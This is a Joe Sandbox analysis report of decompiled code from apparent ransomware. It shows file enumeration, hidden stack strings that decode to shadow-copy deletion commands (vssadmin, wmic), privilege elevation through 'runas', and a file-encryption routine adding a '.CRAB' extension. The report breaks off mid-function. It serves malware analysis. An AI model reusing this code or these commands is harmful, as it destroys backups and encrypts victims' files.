Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
String ID: Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 72144047-1948191093
Opcode ID: cb3575c4476d30356a58e68628b9bd3616f4c3ebe1d1040946c71f76c7827e30
Instruction ID: d3e4e2750df065521610a9cff4345cf9c170171bec9836151ef6ac3ae6b28d4c
Opcode Fuzzy Hash: cb3575c4476d30356a58e68628b9bd3616f4c3ebe1d1040946c71f76c7827e30
Instruction Fuzzy Hash: 20316E74A9030DBBDB10DFA1DD59FEF77B9AB48B45F104058F601AA181DBB8AA009F61

Uniqueness

Uniqueness Score: -1.00%

Function 0FE66DF0 Relevance: 13.6, APIs: 9, Instructions: 109
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FE66DF0(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0FE66BA0(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0FE66D40(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0FE66AB0(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0FE66DF0(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}

APIs

Part of subcall function 0FE66780: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE66793
Part of subcall function 0FE66780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE6685A
Part of subcall function 0FE66780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE66874
Part of subcall function 0FE66780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE6688E
Part of subcall function 0FE66780: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FE66E06,00000000,?,?), ref: 0FE668A8

Part of subcall function 0FE66BA0: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FE66BB2
Part of subcall function 0FE66BA0: lstrcatW.KERNEL32(00000000,0FE6FF44), ref: 0FE66BC4
Part of subcall function 0FE66BA0: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FE66BD2
Part of subcall function 0FE66BA0: lstrcmpW.KERNEL32(?,0FE6FF48,?,?), ref: 0FE66BFC
Part of subcall function 0FE66BA0: lstrcmpW.KERNEL32(?,0FE6FF4C,?,?), ref: 0FE66C12
Part of subcall function 0FE66BA0: lstrcatW.KERNEL32(00000000,?), ref: 0FE66C24
Part of subcall function 0FE66BA0: lstrlenW.KERNEL32(00000000,?,?), ref: 0FE66C2B
Part of subcall function 0FE66BA0: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FE66C5A
Part of subcall function 0FE66BA0: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FE66C71
Part of subcall function 0FE66BA0: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FE66C7C
Part of subcall function 0FE66BA0: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FE66C9A
Part of subcall function 0FE66BA0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FE66CAF

Part of subcall function 0FE66D40: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FE66E22,00000000,?,?), ref: 0FE66D55
Part of subcall function 0FE66D40: wsprintfW.USER32 ref: 0FE66D63
Part of subcall function 0FE66D40: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FE66D7F
Part of subcall function 0FE66D40: GetLastError.KERNEL32(?,?), ref: 0FE66D8C
Part of subcall function 0FE66D40: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FE66DD8

lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FE66E23
lstrcatW.KERNEL32(00000000,0FE6FF44), ref: 0FE66E3B
FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FE66E45
lstrcmpW.KERNEL32(?,0FE6FF48,?,?), ref: 0FE66E7C
lstrcmpW.KERNEL32(?,0FE6FF4C,?,?), ref: 0FE66E96
lstrcatW.KERNEL32(00000000,?), ref: 0FE66EA8
lstrcatW.KERNEL32(00000000,0FE6FF7C), ref: 0FE66EB9
FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FE66F1D
FindClose.KERNEL32(00003000,?,?), ref: 0FE66F2E

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: File$lstrcatlstrcmp$FindFolderPathSpecialVirtual$Alloclstrlen$CreateFirst$CloseErrorFreeLastNextReadSizewsprintf
String ID:
API String ID: 664581897-0
Opcode ID: 83a91ae1404f9ed08542fd17ad3c825aa96aa55352f5d4627f2bdebd0da30e33
Instruction ID: 3d2b9d784fd8d6f898d53d02df3fc12d37f2ab443ee776300e13a0c967b7bb15
Opcode Fuzzy Hash: 83a91ae1404f9ed08542fd17ad3c825aa96aa55352f5d4627f2bdebd0da30e33
Instruction Fuzzy Hash: 5831D371E5021DABCF10AF65DC849AEBBB9FF45794F0050B5F804EB111EB35AA10CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0FE634F0 Relevance: 12.1, APIs: 8, Instructions: 79
memorystringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE634F0(CHAR* __ecx, WCHAR** __edx, WCHAR** _a4) {
				int _v8;
				CHAR* _v12;
				WCHAR** _v16;
				long _t11;
				WCHAR* _t17;
				WCHAR* _t18;
				void* _t23;
				void* _t28;
				int _t29;
				WCHAR** _t30;

				_v16 = __edx;
				_v12 = __ecx;
				_t29 = 0;
				_t11 = lstrlenA(__ecx);
				_v8 = _t11;
				_t23 = VirtualAlloc(0, _t11, 0x3000, 4);
				if(_t23 != 0) {
					if(CryptStringToBinaryA(_v12, 0, 1, _t23,  &_v8, 0, 0) != 0) {
						_t17 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t30 = _v16;
						 *_t30 = _t17;
						_t18 = VirtualAlloc(0, 0x100, 0x3000, 4);
						_t28 = _t23;
						 *_a4 = _t18;
						if( *_t23 != 0x3b) {
							do {
								_t28 = _t28 + 1;
							} while ( *_t28 != 0x3b);
						}
						 *_t28 = 0;
						wsprintfW( *_t30, L"%S", _t23);
						_t8 = _t28 + 1; // 0x2
						wsprintfW( *_a4, L"%S", _t8);
						_t29 = 1;
					}
					VirtualFree(_t23, 0, 0x8000);
				}
				return _t29;
			}

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,0FE63673,00000000), ref: 0FE63504
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,0FE63673,00000000), ref: 0FE6351C
CryptStringToBinaryA.CRYPT32(0FE63673,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FE63535
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0FE63673,00000000), ref: 0FE6354C
VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,?,0FE63673,00000000), ref: 0FE63561
wsprintfW.USER32 ref: 0FE63587
wsprintfW.USER32 ref: 0FE63597
VirtualFree.KERNEL32(00000000,00000000,00008000,?,0FE63673,00000000), ref: 0FE635A9

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$BinaryCryptFreeStringlstrlen
String ID:
API String ID: 2885909284-0
Opcode ID: a9004d3c01990ed29d579552b0de575021fe5b3e4a00b7697d95536901db9c11
Instruction ID: ff4e7cad99a64442f25587e61140d2a20b145800090b139303d5321763d5df8f
Opcode Fuzzy Hash: a9004d3c01990ed29d579552b0de575021fe5b3e4a00b7697d95536901db9c11
Instruction Fuzzy Hash: 6F21C3B1A8031C7FEB219E659C41F9BBFECEF45B94F100065F604F7281D6B56A008B90

Uniqueness

Uniqueness Score: -1.00%

Function 0FE645B0 Relevance: 78.8, APIs: 5, Strings: 40, Instructions: 99
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0FE645B0(void* __eflags) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char _v120;
				short _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				char _v152;
				short _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				short* _v176;
				short* _t51;
				WCHAR* _t59;
				void* _t62;
				signed int _t66;
				void* _t69;

				if(E0FE63CF0(_t62) == 0) {
					_v172 = 0x63005c;
					_v168 = 0x64006d;
					_v8 = 0;
					_t59 =  &_v172;
					_v164 = 0x65002e;
					_t51 =  &_v84;
					_v160 = 0x650078;
					_v156 = 0;
					_v84 = 0x63002f;
					_v80 = 0x760020;
					_v76 = 0x730073;
					_v72 = 0x640061;
					_v68 = 0x69006d;
					_v64 = 0x20006e;
					_v60 = 0x650064;
					_v56 = 0x65006c;
					_v52 = 0x650074;
					_v48 = 0x730020;
					_v44 = 0x610068;
					_v40 = 0x6f0064;
					_v36 = 0x730077;
					_v32 = 0x2f0020;
					_v28 = 0x6c0061;
					_v24 = 0x20006c;
					_v20 = 0x71002f;
					_v16 = 0x690075;
					_v12 = 0x740065;
				} else {
					_v152 = 0x77005c;
					_v148 = 0x650062;
					_t59 =  &_v152;
					_v144 = 0x5c006d;
					_t51 =  &_v120;
					_v140 = 0x6d0077;
					_v136 = 0x630069;
					_v132 = 0x65002e;
					_v128 = 0x650078;
					_v124 = 0;
					_v120 = 0x680073;
					_v116 = 0x640061;
					_v112 = 0x77006f;
					_v108 = 0x6f0063;
					_v104 = 0x790070;
					_v100 = 0x640020;
					_v96 = 0x6c0065;
					_v92 = 0x740065;
					_v88 = 0x65;
				}
				_v176 = _t51;
				_t69 = VirtualAlloc(0, 0x400, 0x3000, 0x40);
				if(_t69 != 0) {
					GetSystemDirectoryW(_t69, 0x100);
					lstrcatW(_t69, _t59);
					ShellExecuteW(0, L"open", _t69, _v176, 0, 0);
					asm("sbb edi, edi");
					_t66 =  ~0x20;
				} else {
					_t66 = 0;
				}
				VirtualFree(_t69, 0, 0x8000);
				return _t66;
			}

APIs

Part of subcall function 0FE63CF0: _memset.LIBCMT ref: 0FE63D42
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FE63D66
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FE63D6A
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FE63D6E
Part of subcall function 0FE63CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FE63D95

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000040), ref: 0FE6476F
GetSystemDirectoryW.KERNEL32(00000000,00000100), ref: 0FE64785
lstrcatW.KERNEL32(00000000,0063005C), ref: 0FE6478D
ShellExecuteW.SHELL32(00000000,open,00000000,?,00000000,00000000), ref: 0FE647A3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE647B7

Strings

open, xrefs: 0FE6479C
e, xrefs: 0FE6464B
e, xrefs: 0FE64653
c, xrefs: 0FE6462B
a, xrefs: 0FE646B1
x, xrefs: 0FE64606
\, xrefs: 0FE645CE
t, xrefs: 0FE646DF
., xrefs: 0FE64680
n, xrefs: 0FE646C1
/, xrefs: 0FE64737
w, xrefs: 0FE645EE
h, xrefs: 0FE646F5
, xrefs: 0FE646EA
a, xrefs: 0FE64721
/, xrefs: 0FE64699
e, xrefs: 0FE6474D
l, xrefs: 0FE6472C
m, xrefs: 0FE645E2
d, xrefs: 0FE64700
m, xrefs: 0FE6466C
w, xrefs: 0FE6470B
s, xrefs: 0FE646A9
b, xrefs: 0FE645D6
e, xrefs: 0FE64643
m, xrefs: 0FE646B9
l, xrefs: 0FE646D4
o, xrefs: 0FE64623
a, xrefs: 0FE6461B
., xrefs: 0FE645FE
d, xrefs: 0FE646C9
, xrefs: 0FE646A1
, xrefs: 0FE64716
u, xrefs: 0FE64742
p, xrefs: 0FE64633
s, xrefs: 0FE64613
x, xrefs: 0FE6468C
, xrefs: 0FE6463B
\, xrefs: 0FE64662
i, xrefs: 0FE645F6

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocDirectoryExecuteFreeInfoShellSystemVerifyVersion_memsetlstrcat
String ID: $ $ $ $.$.$/$/$\$\$a$a$a$b$c$d$d$e$e$e$e$h$i$l$l$m$m$m$n$o$open$p$s$s$t$u$w$w$x$x
API String ID: 2684037697-4098772853
Opcode ID: 0afc8d905ec4e635e6ae835d14fc8aec89f750c53e1f3b60bc336c7a0992178d
Instruction ID: 83dfc24c34d4e78f8b4ca36d800704242c9e2b2c4ba55101326b6caff9ce6e32
Opcode Fuzzy Hash: 0afc8d905ec4e635e6ae835d14fc8aec89f750c53e1f3b60bc336c7a0992178d
Instruction Fuzzy Hash: E14138B0148384DFE320CF119848B5BBEE2BB81B89F00591CE6985A291C7F6854CCF97

Uniqueness

Uniqueness Score: -1.00%

Function 0FE63DB0 Relevance: 77.1, APIs: 9, Strings: 35, Instructions: 109
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FE63DB0(void* __ecx, void* __edx, void* __eflags) {
				char _v1020;
				short _v1028;
				char _v1532;
				short _v1540;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				short _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				short _v1676;
				char _v1680;
				int _t54;
				struct HWND__* _t62;
				long _t66;
				void* _t76;
				void* _t78;
				void* _t80;

				_t78 = __ecx;
				_t54 = E0FE63CF0(__edx);
				if(_t54 != 0) {
					_t54 = E0FE63C70();
					if(_t54 == 0) {
						_v1676 = 0x770025;
						_v1672 = 0x6e0069;
						_v1668 = 0x690064;
						_v1664 = 0x250072;
						_v1660 = 0x73005c;
						_v1656 = 0x730079;
						_v1652 = 0x650074;
						_v1648 = 0x33006d;
						_v1644 = 0x5c0032;
						_v1640 = 0x620077;
						_v1636 = 0x6d0065;
						_v1632 = 0x77005c;
						_v1628 = 0x69006d;
						_v1624 = 0x63;
						ExpandEnvironmentStringsW( &_v1676,  &_v1540, 0xff);
						_v1620 = 0x720070;
						_v1616 = 0x63006f;
						_v1612 = 0x730065;
						_v1608 = 0x200073;
						_v1604 = 0x610063;
						_v1600 = 0x6c006c;
						_v1596 = 0x630020;
						_v1592 = 0x650072;
						_v1588 = 0x740061;
						_v1584 = 0x200065;
						_v1580 = 0x630022;
						_v1576 = 0x64006d;
						_v1572 = 0x2f0020;
						_v1568 = 0x200063;
						_v1564 = 0x740073;
						_v1560 = 0x720061;
						_v1556 = 0x200074;
						_v1552 = 0x730025;
						_v1548 = 0x22;
						wsprintfW( &_v1028,  &_v1620, _t78);
						_t76 = VirtualAlloc(0, 0x3d, 0x3000, 0x40);
						 *_t76 = 0x3c;
						 *(_t76 + 4) = 0x40;
						_t62 = GetForegroundWindow();
						_t80 = 0;
						 *(_t76 + 8) = _t62;
						_v1680 = 0x750072;
						_v1676 = 0x61006e;
						_v1672 = 0x73;
						 *((intOrPtr*)(_t76 + 0xc)) =  &_v1680;
						 *((intOrPtr*)(_t76 + 0x10)) =  &_v1532;
						 *((intOrPtr*)(_t76 + 0x14)) =  &_v1020;
						 *(_t76 + 0x18) = 0;
						 *(_t76 + 0x1c) = 0;
						 *(_t76 + 0x20) = 0;
						while(1) {
							_t66 = ShellExecuteExW(_t76);
							if(_t66 != 0) {
								break;
							}
							_t80 = _t80 + 1;
							if(_t80 < 0x64) {
								continue;
							}
							_t54 = VirtualFree(_t76, _t66, 0x8000);
							goto L6;
						}
						WaitForSingleObject( *(_t76 + 0x38), 0xffffffff);
						CloseHandle( *(_t76 + 0x38));
						ExitProcess(0);
					}
				}
				L6:
				return _t54;
			}

APIs

Part of subcall function 0FE63CF0: _memset.LIBCMT ref: 0FE63D42
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0FE63D66
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0FE63D6A
Part of subcall function 0FE63CF0: VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0FE63D6E
Part of subcall function 0FE63CF0: VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0FE63D95

Part of subcall function 0FE63C70: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FE63CA0

ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0FE63E5D
wsprintfW.USER32 ref: 0FE63F27
VirtualAlloc.KERNEL32(00000000,0000003D,00003000,00000040), ref: 0FE63F3B
GetForegroundWindow.USER32 ref: 0FE63F50
ShellExecuteExW.SHELL32(00000000), ref: 0FE63FB1
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE63FC4
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0FE63FD6
CloseHandle.KERNEL32(?), ref: 0FE63FDF
ExitProcess.KERNEL32 ref: 0FE63FE7

Strings

y, xrefs: 0FE63E15
t, xrefs: 0FE63E1D
m, xrefs: 0FE63ECF
", xrefs: 0FE63EC4
a, xrefs: 0FE63EFB
c, xrefs: 0FE63EE5
s, xrefs: 0FE63E89
w, xrefs: 0FE63E35
\, xrefs: 0FE63E0D
i, xrefs: 0FE63DF4
e, xrefs: 0FE63EB9
n, xrefs: 0FE63F6D
\, xrefs: 0FE63E45
e, xrefs: 0FE63E3D
%, xrefs: 0FE63DE7
r, xrefs: 0FE63E05
", xrefs: 0FE63F1C
m, xrefs: 0FE63E25
c, xrefs: 0FE63E91
d, xrefs: 0FE63DFD
r, xrefs: 0FE63F65
, xrefs: 0FE63EA1
c, xrefs: 0FE63E55
%, xrefs: 0FE63F11
r, xrefs: 0FE63EA9
, xrefs: 0FE63EDA
l, xrefs: 0FE63E99
p, xrefs: 0FE63E68
s, xrefs: 0FE63F75
2, xrefs: 0FE63E2D
t, xrefs: 0FE63F06
a, xrefs: 0FE63EB1
e, xrefs: 0FE63E81
s, xrefs: 0FE63EF0
o, xrefs: 0FE63E78

Memory Dump Source

Source File: 00000004.00000002.383034284.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000004.00000002.383030160.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383041261.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.383052166.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: ConditionMask$Virtual$AllocAllocateCloseEnvironmentExecuteExitExpandForegroundFreeHandleInfoInitializeObjectProcessShellSingleStringsVerifyVersionWaitWindow_memsetwsprintf
String ID: $ $"$"$%$%$2$\$\$a$a$c$c$c$d$e$e$e$i$l$m$m$n$o$p$r$r$r$s$s$s$t$t$w$y
API String ID: 561366689-3790645798
Opcode ID: a21af672b5fa1719efb7f604856275fed513ce5a532ae3587b463059e2779d0b
Instruction ID: abbea56565a493e718287e3e7b90639c6aa320c1489ecf09ce49804fd62ebe9c
Opcode Fuzzy Hash: a21af672b5fa1719efb7f604856275fed513ce5a532ae3587b463059e2779d0b
Instruction Fuzzy Hash: E3515AB0408344DFE3208F11C44878BBFF9BF85799F00492DE69896251C7FA9158CF92

Uniqueness

Uniqueness Score: -1.00%

Function 0FE637B0 Relevance: 66.8, APIs: 32, Strings: 6, Instructions: 320
memorystringwindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0FE637B0(WCHAR* __ecx, void* __edx, void* __eflags) {
				long _v8;
				void* _v12;
				long _v16;
				long _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				void _v40;
				void _v44;
				signed int _v48;
				WCHAR* _v52;
				WCHAR* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				short _v80;
				int _v84;
				char _v88;
				char _v104;
				char _v108;
				char _v140;
				char _v388;
				void* _t96;
				void* _t97;
				struct HWND__* _t99;
				void* _t101;
				void* _t107;
				long _t124;
				long _t125;
				long _t128;
				WCHAR* _t145;
				void* _t147;
				void* _t149;
				void* _t151;
				WCHAR* _t162;
				void* _t163;
				void* _t164;
				void _t165;
				void* _t166;
				long _t168;
				void* _t173;
				void* _t175;
				void* _t176;
				void* _t177;

				_t145 = __ecx;
				_t166 = __edx;
				_v52 = __ecx;
				SetFileAttributesW(_t145, GetFileAttributesW(__ecx) & 0xfffffffe);
				_v20 = 0;
				_v32 = 0;
				_t151 = _t166;
				E0FE66500(_t151, 0, 0,  &_v20,  &_v32);
				_t162 = VirtualAlloc(0, 0x401, 0x3000, 0x40);
				_v80 = 0x43002e;
				_v56 = _t162;
				_v76 = 0x410052;
				_v72 = 0x42;
				lstrcpyW(_t162, _t145);
				lstrcatW(_t162,  &_v80);
				asm("movdqa xmm0, [0xfe70530]");
				asm("movdqu [ebp-0x88], xmm0");
				_push(_t151);
				asm("movdqa xmm0, [0xfe70530]");
				asm("movdqu [ebp-0x78], xmm0");
				_v108 = 0;
				asm("movdqa xmm0, [0xfe70530]");
				asm("movdqu [ebp-0x64], xmm0");
				E0FE68400( &_v104, 0x10);
				E0FE68400( &_v140, 0x20);
				_t96 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x88]");
				asm("movdqu [ebx], xmm0");
				asm("movdqu xmm0, [ebp-0x78]");
				_v24 = _t96;
				asm("movdqu [ebx+0x10], xmm0");
				_t97 = VirtualAlloc(0, 0x800, 0x3000, 4);
				asm("movdqu xmm0, [ebp-0x64]");
				_t163 = _t97;
				_v60 = _t163;
				asm("movdqu [edi], xmm0");
				_v88 = 0x20;
				_v84 = 0x10;
				_t99 = E0FE66660(_v20, _v32, _t96,  &_v88, 0x800);
				_t175 = _t173 + 0x18;
				if(_t99 != 0) {
					_t101 = E0FE66660(_v20, _v32, _t163,  &_v84, 0x800);
					_t176 = _t175 + 0x14;
					if(_t101 != 0) {
						E0FE68520( &_v140,  &_v388);
						_t177 = _t176 + 8;
						_t147 = CreateFileW(_v52, 0xc0000000, 1, 0, 3, 0x80, 0);
						_v28 = _t147;
						if(_t147 != 0xffffffff) {
							_t164 = VirtualAlloc(0, 8, 0x3000, 4);
							 *_t164 = 0;
							 *(_t164 + 4) = 0;
							_t107 = VirtualAlloc(0, 0x100001, 0x3000, 4);
							_t168 = 0;
							_v12 = _t107;
							_v36 = 0;
							while(ReadFile(_t147, _t107, 0x100000,  &_v8, 0) != 0) {
								_t124 = _v8;
								if(_t124 != 0) {
									_t149 = 0;
									_v64 = 0;
									_t168 =  <  ? 1 : _t168;
									 *_t164 =  *_t164 + _t124;
									asm("adc [edi+0x4], ebx");
									_t125 = _v8;
									_v48 = _t125;
									if((_t125 & 0x0000000f) != 0) {
										do {
											_t125 = _t125 + 1;
										} while ((_t125 & 0x0000000f) != 0);
										_v8 = _t125;
									}
									_v68 = VirtualAlloc(0, _t125, 0x3000, 4);
									E0FE68B20(_t126, _v12, _v48);
									_t128 = _v8;
									_t177 = _t177 + 0xc;
									_v40 = _t128;
									if(VirtualAlloc(0, _t128, 0x3000, 4) != 0) {
										E0FE636D0(_v68, _v40,  &_v64,  &_v388,  &_v104, _t129);
										_t149 = _v64;
										_t177 = _t177 + 0x10;
									}
									VirtualFree(_v68, 0, 0x8000);
